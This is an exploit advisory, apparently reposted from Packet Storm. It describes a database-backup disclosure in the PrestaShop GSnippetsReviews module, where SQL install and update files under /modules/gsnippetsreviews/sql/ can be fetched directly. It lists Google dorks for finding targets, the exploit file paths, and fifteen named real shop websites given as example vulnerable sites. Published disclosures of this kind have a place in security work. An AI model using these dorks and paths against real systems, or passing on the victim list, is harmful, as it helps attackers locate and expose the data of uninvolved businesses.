####################################################################
# Exploit Title : PrestaShop Google GSnippetsReviews Modules 1.6.1.4 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/01/2019
# Vendor Homepage : prestashop.com
# Software Download Link : addons.prestashop.com/en/seo-natural-search-engine-optimization/
6144-customer-ratings-and-reviews-pro-google-rich-snippets.html
+ sourceforge.net/projects/prestashopratingreview/
+ codecanyon.net/item/prestashop-products-review-google-rich-snippets-module/20545945
+ storeprestamodules.com/prestashop-modules-google-snippets-product-reviews.html
# Software Price : 100 Euro
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.11.0± - 1.4.7.0 - 1.4.6.2 - 1.5.4.0 -
1.5.6.1- 1.5.6.2 - 1.5.3.1 - 1.6.0.12± - 1.6.1.1± - 1.6.1.4±
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/gsnippetsreviews/sql/''
intext:''© 2013 - Vinta Quatre. Tous droits réservés - Création Yellow Agence Internet''
intext:''© 2018 - DECO LED VLC''
intext:''Powered by e-com''
intext:''© 2018 Sud Corner tous droits réservés''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
# PacketStormSecurity Exploit Reference Link :
packetstormsecurity.com/files/150904/PrestaShop-Google-GSnippetsReviews-1.6.1.4-Database-Disclosure.html
####################################################################
# Exploit :
/modules/gsnippetsreviews/sql/install.sql
/modules/gsnippetsreviews/sql/uninstall.sql
/modules/gsnippetsreviews/sql/update-date-rating.sql
/modules/gsnippetsreviews/sql/update-lang-review.sql
/modules/gsnippetsreviews/sql/update-voucher-fb.sql
###################################################################
# Example Vulnerable Sites =>
[+] vinta-quatre.com/modules/gsnippetsreviews/sql/uninstall.sql
[+] himmelslaternen.ch/modules/gsnippetsreviews/sql/install.sql
[+] decoledvalencia.com/modules/gsnippetsreviews/sql/install.sql
[+] cactose-boutique.fr/modules/gsnippetsreviews/sql/install.sql
[+] kakicrazy.fr/modules/gsnippetsreviews/sql/install.sql
[+] originalveniceshop.com/modules/gsnippetsreviews/sql/update-date-rating.sql
[+] sudcorner.com/modules/gsnippetsreviews/sql/update-lang-review.sql
[+] cobureau.net/modules/gsnippetsreviews/sql/update-voucher-fb.sql
[+] mondo-bougies.com/modules/gsnippetsreviews/sql/update-date-rating.sql
[+] rygeshop.dk/modules/gsnippetsreviews/sql/update-voucher-fb.sql
[+] nsbconcept.com/modules/gsnippetsreviews/sql/update-date-rating.sql
[+] ventiladorestecho.net/modules/gsnippetsreviews/sql/uninstall.sql
[+] mediaperfect.fr/shop/modules/gsnippetsreviews/sql/install.sql
[+] tu-instrumento.com.ar/modules/gsnippetsreviews/sql/update-voucher-fb.sql
[+] multicouche-et-accessoires.fr/modules/gsnippetsreviews/sql/update-date-rating.sql
####################################################################
# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################